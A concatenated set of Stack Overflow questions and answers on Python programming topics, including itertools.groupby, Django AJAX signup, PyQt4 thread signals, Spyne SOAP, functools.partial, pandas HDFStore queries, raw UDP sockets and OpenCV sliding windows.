<p>Why is it that</p> <pre><code>&gt;&gt;&gt; [ ( { k: len(list(g)) } ) for k, g in groupby(sorted('ABABAABBAC')) ] [{'A': 5}, {'B': 4}, {'C': 1}] </code></pre> <p>but</p> <pre><code>&gt;&gt;&gt; [ ( { k: len(list(g)) } ) for k, g in groupby(sorted('ABABAABBAC')) if len(list(g)) &gt; 1 ] [{'A': 0}, {'B': 0}] </code></pre> <p>It correctly filters out <code>C</code> but why are the values <code>0</code>s instead of <code>4</code> and <code>5</code>? It makes no sense.</p> <p>(It's trivial to find a working solution, but I want to understand what's going on here).</p>
2
2016-07-21T11:33:24Z
38,503,255
<p>You have consumed the iterator when you called <code>len(list(g))</code> in your <em>if statement</em> so your <code>len(list(g))</code> returns 0 as there is nothing left to iterate over. </p> <pre><code>In [1]: it = iter([1,2,3]) In [2]: list(it) # call list once consumes Out[2]: [1, 2, 3] In [3]: list(it) # nothing left on second call Out[3]: [] </code></pre> <p>So <code>len([])</code> as you would expect returns 0</p>
3
2016-07-21T11:37:50Z
[ "python", "grouping", "list-comprehension" ]
Django user signup / registration form not working
38,503,189
<p>I made a sign up form following a tutorial.</p> <p>what im trying to do as you can see here is to have the data transferred and get an error or success message to the targeted div in response without refreshing the page.</p> <p>i have set the 3 forms : email ,email2 and password in the index.html</p> <p>but the site is not doing anything, and apparantly it doesn't work.</p> <p>I am also getting the </p> <p>TypeError: is not JSON serializable</p> <p>error.</p> <p>I think im doing something wrong here.</p> <p>can you explain to me what im doing is wrong?</p> <p>thanks.</p> <p>index.html</p> <pre><code> &lt;script&gt; // using jQuery function getCookie(name) { var cookieValue = null; if (document.cookie &amp;&amp; document.cookie !== '') { var cookies = document.cookie.split(';'); for (var i = 0; i &lt; cookies.length; i++) { var cookie = jQuery.trim(cookies[i]); // Does this cookie string begin with the name we want? if (cookie.substring(0, name.length + 1) === (name + '=')) { cookieValue = decodeURIComponent(cookie.substring(name.length + 1)); break; } } } return cookieValue; } var csrftoken = getCookie('csrftoken'); function csrfSafeMethod(method) { // these HTTP methods do not require CSRF protection return (/^(GET|HEAD|OPTIONS|TRACE)$/.test(method)); } $.ajaxSetup({ beforeSend: function(xhr, settings) { if (!csrfSafeMethod(settings.type) &amp;&amp; !this.crossDomain) { xhr.setRequestHeader("X-CSRFToken", csrftoken); } } }); &lt;/script&gt; &lt;div class="signup_div"&gt; &lt;form id="signup_form" method="post" action=""&gt; {% csrf_token %} &lt;div class="field-wrap"&gt; &lt;!--&lt;label&gt; Email Address &lt;/label&gt;--&gt; &lt;input required="" type="text" name="email" placeholder="Email address"&gt; &lt;/div&gt; &lt;div class="field-wrap"&gt; &lt;!--&lt;label&gt; Email Address &lt;/label&gt;--&gt; &lt;input required="" type="text" name="email2" placeholder="Email address"&gt; &lt;/div&gt; &lt;div class="field-wrap"&gt; &lt;!--&lt;label&gt; Password &lt;/label&gt;--&gt; &lt;input required="" type="password" name="password" placeholder="Password"&gt; &lt;/div&gt; &lt;button class="ladda-button forgot" data-color="mint" data-style="slide-up"&gt;&lt;a href=""&gt;&lt;span class="ladda-label"&gt;Forgot Password?&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;/button&gt; &lt;button class="ladda-button button-primary login_button" data-style="slide-up"/&gt;&lt;span class="ladda-label"&gt;Sign Up&lt;/span&gt;&lt;/button&gt; &lt;/form&gt; &lt;/div&gt; &lt;script&gt; $('#signup_form').on('submit', function(e) { e.preventDefault() formdata = $('#signup_form').serialize(); formdata.csrfmiddlewaretoken = '{{ csrf_token }}'; $.ajax({ type:"POST", data: formdata, url: '{% url 'signup' %}', error: function(response){ $('.login_div').text(response.error) }, success: function(response){ &lt;!--console.log(response);--&gt; $('.signup_div').text(response.success) $('.signup_div').text(response.error) // do something with response } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; </code></pre> <p>views.py</p> <pre><code> def ajax_signup(request): form = UserSignupForm(request.POST or None) if form.is_valid(): user = form.save(commit=False) password = form.cleaned_data.get('password') user.set_password(password) user.save() new_user = authenticate(username=user.username, password=password) login(request, new_user) data = {'form': form, 'success': 'success'} else: data = {'form': form, 'error': 'error'} return HttpResponse(json.dumps(data), content_type='application/json') </code></pre> <p>and forms.py</p> <pre><code> from django import forms from django.contrib.auth.models import User from django.contrib.auth import authenticate, get_user_model, login, logout class UserSignupForm(forms.ModelForm): email = forms.EmailField(label='Confirm Email') email2 = forms.EmailField(label='Confirm Email') password = forms.CharField(widget=forms.PasswordInput) class Meta: model = User fields = [ 'username', 'email2', 'email', 'password' ] def clean_email(self): email = self.cleaned_data.get('email') email2 = self.cleaned_data.get('email2') if email != email2: raise forms.ValidationError("Emails must match") email_qs = User.objects.filter(email=email) if email_qs.exists(): raise forms.ValidationError("This email has already been registered") return email </code></pre>
0
2016-07-21T11:34:47Z
38,503,774
<p>As correctly pointed out by <a href="http://stackoverflow.com/questions/38503189/django-user-signup-registration-form-not-working/38503774#comment64405258_38503189">Nikhil</a>, you are trying to serialize a form instance. Instead, you should serialize the form data.</p> <p>From the <a href="https://docs.djangoproject.com/en/1.9/topics/forms/#field-data" rel="nofollow">Django Docs</a>:</p> <blockquote> <p>Whatever the data submitted with a form, once it has been successfully validated by calling is_valid() (and is_valid() has returned True), the validated form data will be in the form.cleaned_data dictionary.</p> </blockquote> <p>Also, <code>form.cleaned_data</code> will not be available if is_valid() does not return True. You can instead use <code>request.POST</code></p> <p>Instead of:</p> <pre><code> data = {'form': form, 'success': 'success'} else: data = {'form': form, 'error': 'error'} </code></pre> <p>You want to do:</p> <pre><code> data = {'form': form.cleaned_data, 'success': 'success'} else: data = {'form': request.POST, 'error': 'error'} </code></pre>
1
2016-07-21T12:02:52Z
[ "jquery", "python", "django" ]
How to emit same signal for 2 classess from QThread
38,503,592
<p>I want to do that: There is a class called as 'Main'. There is another class called as 'aClass'. And there is a thirth class called as 'Thread'. It is our thread class. 'Main' is our main class and we start our Thread class from Main class. When our Thread class is started, it emits a signal from run() function... 'Main' and 'aClass' classes try to catch these signals. 'Main' class is able to catch the signal which was emitted from Thread class but 'aClass' can't catch the same signal because I didn't start QThread from 'aClass'. I only defined it in 'aClass'.</p> <p>Here are codes:</p> <pre><code>#!/usr/bin/env python from PyQt4.QtGui import * from PyQt4.QtCore import * import sys class Main(QMainWindow): def __init__(self): QMainWindow.__init__(self) self.setWindowTitle("Test") self.aClass = aClass() self.thread = Thread() self.thread.printMessage.connect(self.write) self.initUI() def initUI(self): self.button = QPushButton("Start Process", self) self.button.clicked.connect(self.startProcess) def startProcess(self): self.thread.start() def terminateProcess(self): self.thread.terminate() def write(self): print "Main: hello world..." class aClass(object): def __init__(self): print "aClass: I have been started..." self.thread = Thread() self.thread.printMessage.connect(self.write) def write(self): print "aClass: hello world..." class Thread(QThread): printMessage = pyqtSignal() def __init__(self): QThread.__init__(self) print "Thread: I have been started..." def run(self): self.printMessage.emit() print "Thread: I emitted the message." if __name__ == "__main__": app = QApplication(sys.argv) root = Main() root.show() app.exec_() </code></pre> <p>The result: When the program starts, the output is:</p> <pre><code>aClass: I have been started... Thread: I have been started... Thread: I have been started... </code></pre> <p>When I click on 'Start Process' button, the output is:</p> <pre><code>Thread: I emitted the message. Main: hello world... </code></pre> <p>Total output:</p> <pre><code>aClass: I have been started... Thread: I have been started... Thread: I have been started... Thread: I emitted the message. Main: hello world... </code></pre> <p>The output that I want to get when I click 'Start Process':</p> <pre><code>Thread: I emitted the message. Main: hello world... aClass: hello world... </code></pre> <p>I want this result but I don't want to use self.thread.start() command from 'aClass' because I want to run Thread for only one time...</p>
0
2016-07-21T11:54:40Z
38,503,890
<p>What you are doing is creating a second <code>Thread</code> in the <code>aClass</code> object which is not the same <code>Thread</code> as in the <code>Main</code>. You need to connect the signal from the <code>self.thread</code> in <code>Main</code> to the Slot <code>write</code> in your <code>self.aClass</code> object.</p> <p>You want to do this instead:</p> <pre><code>class Main(QMainWindow): def __init__(self): QMainWindow.__init__(self) self.setWindowTitle("Test") self.aClass = aClass() self.thread = Thread() self.thread.printMessage.connect(self.write) self.thread.printMessage.connect(self.aClass.write) ... class aClass(object): def __init__(self): print "aClass: I have been started..." #self.thread = Thread() #This makes a new Thread #self.thread.printMessage.connect(self.write) def write(self): print "aClass: hello world..." self.initUI() </code></pre>
0
2016-07-21T12:08:33Z
[ "python", "pyqt4", "qthread" ]
Send request on webservice from URL
38,503,703
<p>I have SOAP webservice written in python with Spyne module..</p> <p>This is it:</p> <pre><code>class Function(spyne.Service): __service_url_path__ = '/soap'; __in_protocol__ = Soap11(validator='lxml'); __out_protocol__ = Soap11(); @spyne.srpc(Unicode, _returns=Iterable(Unicode)) def Function(A): #some code if __name__ == '__main__': app.run(host = '127.0.0.1'); </code></pre> <p>And I need to send request on that server from URL. It should look like this: </p> <pre><code>IP:port/soap/function?A=1 </code></pre> <p>But when I try it, this appears:</p> <pre><code>You must issue a POST request with the Content-Type header properly set </code></pre> <p>But I don´t know what it is.. How it should be properly? Can someone help with it?</p> <p>Should I just change that URL, or server code too?</p> <p>Thank you very much</p>
0
2016-07-21T11:59:31Z
38,542,891
<p>So, now, I have it.</p> <p><strong>This is correct way:</strong></p> <pre><code>class Function(spyne.Service): __service_url_path__ = '/soap'; __in_protocol__ = HttpRpc(validator='soft'); #this is it __out_protocol__ = Soap11(); </code></pre> <p>Now, I can <strong>call web service from URL</strong> like this:</p> <pre><code>IP:port/soap/function?A=1 </code></pre> <p>So, this is it.. I hope that it will help someone sometimes :)</p>
0
2016-07-23T14:31:13Z
[ "python", "web-services", "post", "get", "spyne" ]
Parsing default arguments in python functions without executing the function
38,503,937
<p>I need to pass a function (without calling it) to another function, but I need to specify a different value for a default argument.</p> <p>For example:</p> <pre><code>def func_a(input, default_arg=True): pass def func_b(function): pass func_b(func_a(default_arg=False)) </code></pre> <p>This, however, <em>calls</em> <code>func_a()</code> and passes the result to <code>func_b()</code>.</p> <p>How do I set <code>default_arg=False</code> without executing <code>func_a</code>?</p>
1
2016-07-21T12:10:44Z
38,503,995
<p>Use a <a href="https://docs.python.org/3/library/functools.html#functools.partial" rel="nofollow"><code>functools.partial()</code> object</a>:</p> <pre><code>from functools import partial func_b(partial(func_a, default_arg=False)) </code></pre> <p>The <code>partial()</code> object is a callable too, when called it'll apply the arguments you gave it to the first argument.</p> <p>Demo:</p> <pre><code>&gt;&gt;&gt; from functools import partial &gt;&gt;&gt; def func_a(input, default_arg=True): ... print('func_a() called with {!r}, and default_arg={!r}'.format(input, default_arg)) ... &gt;&gt;&gt; def func_b(function): ... print('Calling the function') ... function('Foo bar') ... &gt;&gt;&gt; func_b(partial(func_a, default_arg=False)) Calling the function func_a() called with 'Foo bar', and default_arg=False </code></pre>
4
2016-07-21T12:13:41Z
[ "python", "function", "python-3.x", "default-arguments" ]
Parsing default arguments in python functions without executing the function
38,503,937
<p>I need to pass a function (without calling it) to another function, but I need to specify a different value for a default argument.</p> <p>For example:</p> <pre><code>def func_a(input, default_arg=True): pass def func_b(function): pass func_b(func_a(default_arg=False)) </code></pre> <p>This, however, <em>calls</em> <code>func_a()</code> and passes the result to <code>func_b()</code>.</p> <p>How do I set <code>default_arg=False</code> without executing <code>func_a</code>?</p>
1
2016-07-21T12:10:44Z
38,504,255
<p>Use a lambda-function. Like this:</p> <pre><code>func_b(lambda input: func_a(input, default_arg=False)) </code></pre> <p>In <code>func_b</code> you will have a callable <code>function</code> which accepts argument input and executes <code>func_a</code> with previously specified <code>default_arg</code> argument.</p> <p><strong>EDITED:</strong></p> <p>Thanks to <a href="https://stackoverflow.com/users/736308/cdarke">cdarke</a> who is trying to say us that there is only one right way to do this.</p> <pre><code>from functools import partial, wraps def func_wrapper(f, **kwargs): @wraps(f) def wrapper(input): return f(input, **kwargs) return wrapper func_b(func_wrapper(func_a, default_arg=False)) </code></pre>
2
2016-07-21T12:25:50Z
[ "python", "function", "python-3.x", "default-arguments" ]
What does a comma mean in python?
38,503,941
<p>I stumbled upon this piece of code:</p> <pre><code>from gensim import corpora, models, similarities import numpy as np corpus = corpora.BleiCorpus('/home/edward/ap/ap.dat', '/home/edward/ap/vocab.txt') model = models.ldamodel.LdaModel(corpus, id2word = corpus.id2word, alpha=1) topics = [model[a] for a in corpus] dense = np.zeros((len(topics), 100), float) for ti, t in enumerate(topics): for tj, v in t: dense[ti,tj] = v </code></pre> <p>what does the comma in </p> <pre><code>dense[ti, tj] </code></pre> <p>mean? I don't think it's splitting the array and making tuples, because for that to happen, it needs to be like:</p> <pre><code>dense[:ti, tj] </code></pre> <p>right? the files declared in "Bleicorpus" are sample news texts from CNN. This was on a book called "Building Machine Learning Systems With Python".</p>
-8
2016-07-21T12:10:53Z
38,504,009
<p>In this case it creates the tuple <code>(ti, tj)</code> and passes it to <code>dense.__getitem__()</code>. As to what that accomplishes, you will need to see the documentation and/or source for <code>dense</code>'s type.</p>
0
2016-07-21T12:14:17Z
[ "python" ]
What does a comma mean in python?
38,503,941
<p>I stumbled upon this piece of code:</p> <pre><code>from gensim import corpora, models, similarities import numpy as np corpus = corpora.BleiCorpus('/home/edward/ap/ap.dat', '/home/edward/ap/vocab.txt') model = models.ldamodel.LdaModel(corpus, id2word = corpus.id2word, alpha=1) topics = [model[a] for a in corpus] dense = np.zeros((len(topics), 100), float) for ti, t in enumerate(topics): for tj, v in t: dense[ti,tj] = v </code></pre> <p>what does the comma in </p> <pre><code>dense[ti, tj] </code></pre> <p>mean? I don't think it's splitting the array and making tuples, because for that to happen, it needs to be like:</p> <pre><code>dense[:ti, tj] </code></pre> <p>right? the files declared in "Bleicorpus" are sample news texts from CNN. This was on a book called "Building Machine Learning Systems With Python".</p>
-8
2016-07-21T12:10:53Z
38,504,042
<p>The code <code>dense[ti, tj]</code> calls <code>dense.__getitem__((ti, tj))</code>. The comma in this case constructs a tuple. This doesn't work with lists, but it could work with a dictionary if the keys are tuples.</p> <pre><code>&gt;&gt;&gt; [1,2,3][1, 2] Traceback (most recent call last): File "&lt;stdin&gt;", line 1, in &lt;module&gt; TypeError: list indices must be integers, not tuple &gt;&gt;&gt; {(1, 2): 1}[1, 2] 1 </code></pre>
0
2016-07-21T12:15:56Z
[ "python" ]
Python - socket.recvfrom() get entire IP/UDP packet?
38,503,982
<p>Is there a way to use <code>socket.recvfrom(buf)</code> to get all IP and UPD data? specifically, I want to know the udp header (source port, dest port, length, application data) as well as the ip specifics : what ip did it come from, what address was it sent to?</p> <p>Snippet:</p> <pre><code>addrinfo = socket.getaddrinfo(MULTICAST_ADDR, None)[0] sock = socket.socket(addrinfo[0], socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind(('', DEST_PORT)) #Join Multicast grp. group = socket.inet_pton(addrinfo[0], addrinfo[4][0]) mreq = group + struct.pack('@I', 0) sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq) while True: udp_data,ip_sender = sock.recvfrom(4000) #Only returns udp data field and ip of sender </code></pre> <p>Im on windows, and using socket.SOCK_RAW hangs (?) Are there any work-arounds?</p>
0
2016-07-21T12:13:08Z
38,505,198
<p>Using</p> <pre><code>sock = socket.socket(socket.AF_INET6, socket.SOCK_RAW) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind(('', DEST_PORT)) sock.setsockopt(socket.IPPROTO_IPV6, socket.IP_HDRINCL, 1) </code></pre> <p>before joining multicast grp seems to work! </p>
0
2016-07-21T13:09:57Z
[ "python", "sockets", "udp", "ipv6" ]
Pandas/Python multiply columns by row
38,504,025
<p>Apologies if this is a simple question. </p> <p>I have two dataframes each with the same columns. I need to multiply each row in the second dataframe by the only row in the first. </p> <p>Eventually there will be more columns of different ages so I do not want to just multiply by a scalar. </p> <p>I have used df.multiply() and continue to get NaN for all values presumably because the two df are not matched in length. </p> <p>Is there a way to multiply each row in one dataframe by a singular row in another? </p> <pre><code>age 51200000.0 70000000.0 SFH 0 0.75 0.25 </code></pre> <p>.</p> <pre><code>age 51200000.0 70000000.0 Lambda 91.0 0.000000e+00 0.000000e+00 94.0 0.000000e+00 0.000000e+00 96.0 0.000000e+00 0.000000e+00 98.0 0.000000e+00 0.000000e+00 100.0 0.000000e+00 0.000000e+00 102.0 0.000000e+00 0.000000e+00 ... ... ... 1600000.0 1.127428e+22 8.677663e+21 </code></pre>
0
2016-07-21T12:15:09Z
38,504,133
<p>You can use <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.mul.html" rel="nofollow"><code>mul</code></a> by first row of <code>df1</code> selected by <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.iloc.html" rel="nofollow"><code>iloc</code></a>:</p> <pre><code>print (df2.mul(df1.iloc[0])) </code></pre> <p>Sample:</p> <pre><code>print (df1) 51200000.0 70000000.0 age 0 0.75 0.25 print (df2) 51200000.0 70000000.0 age 91.0 1.0 2.0 94.0 5.0 10.0 96.0 0.0 0.0 print (df2.mul(df1.iloc[0])) 51200000.0 70000000.0 age 91.0 0.75 0.5 94.0 3.75 2.5 96.0 0.00 0.0 </code></pre>
0
2016-07-21T12:20:41Z
[ "python", "pandas", "dataframe", "multiplication" ]
HDFStore: Select if column is in array
38,504,273
<p>I have a table with among others, the following columns:</p> <pre><code>&gt;&gt;&gt; hdf.select('foo').columns Out[22]: Index(['bar', 'units'], dtype='object') </code></pre> <p>Now I wanted to select those where <code>bar</code> has one of two values:</p> <pre><code>myBar = ['1500013010', '1500002071'] hdf.select('foo', 'bar in [{}]'.format(', '.join(myBar))) </code></pre> <p>But I got this Exception that I implied I couldn't use "bar" as a variable.</p> <blockquote> <p>all of the variable refrences must be a reference to an axis (e.g. 'index' or 'columns'), or a data_column The currently defined references are: index,columns</p> </blockquote> <p>But isn't it a column?</p> <pre><code>Traceback (most recent call last): File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/io/pytables.py", line 4593, in generate return Expr(where, queryables=q, encoding=self.table.encoding) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/pytables.py", line 516, in __init__ self.terms = self.parse() File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 726, in parse return self._visitor.visit(self.expr) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 310, in visit return visitor(node, **kwargs) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 316, in visit_Module return self.visit(expr, **kwargs) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 310, in visit return visitor(node, **kwargs) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 319, in visit_Expr return self.visit(node.value, **kwargs) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 310, in visit return visitor(node, **kwargs) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 627, in visit_Compare return self.visit(binop) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 310, in visit return visitor(node, **kwargs) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 400, in visit_BinOp op, op_class, left, right = self._possibly_transform_eq_ne(node) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 351, in _possibly_transform_eq_ne left = self.visit(node.left, side='left') File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 310, in visit return visitor(node, **kwargs) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 413, in visit_Name return self.term_type(node.id, self.env, **kwargs) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/pytables.py", line 38, in __init__ super(Term, self).__init__(name, env, side=side, encoding=encoding) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/ops.py", line 57, in __init__ self._value = self._resolve_name() File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/pytables.py", line 44, in _resolve_name raise NameError('name {0!r} is not defined'.format(self.name)) NameError: name 'bar' is not defined During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/IPython/core/interactiveshell.py", line 2885, in run_code exec(code_obj, self.user_global_ns, self.user_ns) File "&lt;ipython-input-21-75c9827e34f0&gt;", line 1, in &lt;module&gt; hdf.select('foo', 'bar in [{}]'.format(', '.join(bar))) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/io/pytables.py", line 680, in select return it.get_result() File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/io/pytables.py", line 1364, in get_result results = self.func(self.start, self.stop, where) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/io/pytables.py", line 673, in func columns=columns, **kwargs) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/io/pytables.py", line 4021, in read if not self.read_axes(where=where, **kwargs): File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/io/pytables.py", line 3222, in read_axes self.selection = Selection(self, where=where, **kwargs) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/io/pytables.py", line 4580, in __init__ self.terms = self.generate(where) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/io/pytables.py", line 4605, in generate .format(where, ','.join(q.keys())) ValueError: The passed where expression: bar in [1500013010, 1500002071] contains an invalid variable reference all of the variable refrences must be a reference to an axis (e.g. 'index' or 'columns'), or a data_column The currently defined references are: index,columns </code></pre>
0
2016-07-21T12:26:39Z
38,504,517
<p>your column(s) are not indexed, hence not searchable, so you can't use them in the <code>where</code> parameter.</p> <p>Demo:</p> <pre><code>In [131]: df = pd.DataFrame(np.random.randint(0,20,size=(5, 3)), columns=list('ABC')) In [132]: df Out[132]: A B C 0 19 4 18 1 4 14 16 2 17 13 9 3 19 9 13 4 16 8 10 In [133]: fn = 'C:/temp/test.h5' In [134]: store = pd.HDFStore(fn) In [135]: store.append('df', df) In [136]: store.select('df', 'B &gt; 10') --------------------------------------------------------------------------- ... NameError: name 'B' is not defined During handling of the above exception, another exception occurred: ... ValueError: The passed where expression: B &gt; 10 contains an invalid variable reference all of the variable refrences must be a reference to an axis (e.g. 'index' or 'columns'), or a data_column The currently defined references are: index,columns </code></pre> <p>now let's try it with an indexed columns:</p> <pre><code>In [137]: store.append('df_indexed', df, data_columns=True) In [139]: store.select('df_indexed', 'B &gt; 10') Out[139]: A B C 1 4 14 16 2 17 13 9 </code></pre> <p>How to check whether columns are indexed or not:</p> <pre><code>In [154]: store.get_storer('df_indexed').table.colindexes Out[154]: { "C": Index(6, medium, shuffle, zlib(1)).is_csi=False, "index": Index(6, medium, shuffle, zlib(1)).is_csi=False, "B": Index(6, medium, shuffle, zlib(1)).is_csi=False, "A": Index(6, medium, shuffle, zlib(1)).is_csi=False} In [155]: store.get_storer('df').table.colindexes Out[155]: { "index": Index(6, medium, shuffle, zlib(1)).is_csi=False} </code></pre>
2
2016-07-21T12:38:30Z
[ "python", "pandas", "dataframe", "hdf", "hdf5storage" ]
Python + OpenCV, change brightness/darkness outside a sliding window?
38,504,350
<p>I'm working with Python and OpenCV and I'm a newbie in both. For my project, I need to move a sliding window over a picture; for each position of the window the area outside the window must be shown darker than the area inside the window.</p> <p>This is the part of my code that takes care of the picture and window visualization (the valid positions for the sliding window are calculated somewhere else)</p> <pre><code>for (x, y, window) in valid_positions: if window.shape[0] != winH or window.shape[1] != winW: continue # Put here stuff to process the window content # i.e apply a classifier clone = image.copy() cv2.rectangle(clone, (x, y), (x + winW, y + winH), (0, 255, 0), 2) cv2.imshow("Window", clone) cv2.waitKey(1) time.sleep(0.025) </code></pre> <p>The window is created and it slides on the valid positions, so that part works well. But I have absolutely no idea on how to make the picture outside the window appear darker.</p> <p>Any suggestions? Thanks in advance.</p> <p>EDIT: i forgot to add an important detail: my input images are always in black and white (not even greyscale, just black and white pixels). Maybe this makes it easier to alter the brightness/darkness?</p>
1
2016-07-21T12:29:34Z
38,507,263
<p>In general, you can preserve the content inside the window and lower the intensity of the entire image. Then replace the area inside the window with original content. That trick should work. This part of the code may look like</p> <pre><code>clone = image.copy() windowArea = clone[y:y + winH, x:x + winW].copy() clone = np.floor(clone * 0.5).astype('uint8') # 0.5 can be adjusted clone[y:y + winH, x:x + winW] = windowArea cv2.rectangle(clone, (x, y), (x + winW, y + winH), (0, 255, 0), 2) </code></pre>
0
2016-07-21T14:40:09Z
[ "python", "opencv", "brightness" ]
How to read dictionary in different manner?
38,504,377
<p>I'm having one dictionary which key is number and value is one or many lists. I want to read this dictionary so that I can separate key and value. </p> <p><strong>Dictionary-</strong> </p> <pre><code>{ 1468332424064000: '[80000,2]', 1468332423282000: '[30000,6]', 1468332421081000: '[40000,2]', 1468332424121000: '[30000,2][40000,2]', 1468332424014000: '[60000,2]', 1468332421131000: '[40000,2][30000,6]', 1468332422921000: '[60000,2]', 1468332421046000: '[40000,2]', 1468332422217000: '[40000,2]', 1468332424921000: '[40000,2]', 1468332421459000: '[30000,6]', 1468332422579000: '[60000,2][30000,6]', 1468332422779000: '[30000,2]', 1468332424161000: '[70000,6]' } </code></pre> <p><strong>Program-Code-</strong></p> <pre><code>for k,v in latency_obj.d.iteritems(): li = v.split() for l in li: print l </code></pre> <p><strong>Output-</strong></p> <pre><code>[80000,2] [30000,6] [40000,2] [30000,2][40000,2] [60000,2] [40000,2][30000,6] [60000,2] [40000,2] [40000,2] [40000,2] [30000,6] [60000,2][30000,6] [30000,2] [70000,6] </code></pre> <p>But I want this two lists as a separate lists so that I can retrieve values of that lists. Any Idea What I'm missing?</p>
0
2016-07-21T12:30:34Z
38,504,637
<p>Assuming that you expect your result to look like</p> <pre><code>[80000,2] [30000,2] [40000,2] [60000,2] [30000,6] [40000,2] [30000,6] [30000,2] [40000,2] [40000,2] [70000,6] [60000,2] [30000,6] [60000,2] [40000,2] [40000,2] [30000,6] </code></pre> <p>I suggest splitting each value on <code>[</code>, like so:</p> <pre><code>for k, v in d.iteritems(): li = v.split('[') for l in li: if l: print '[' + l </code></pre>
0
2016-07-21T12:44:59Z
[ "python", "list", "dictionary" ]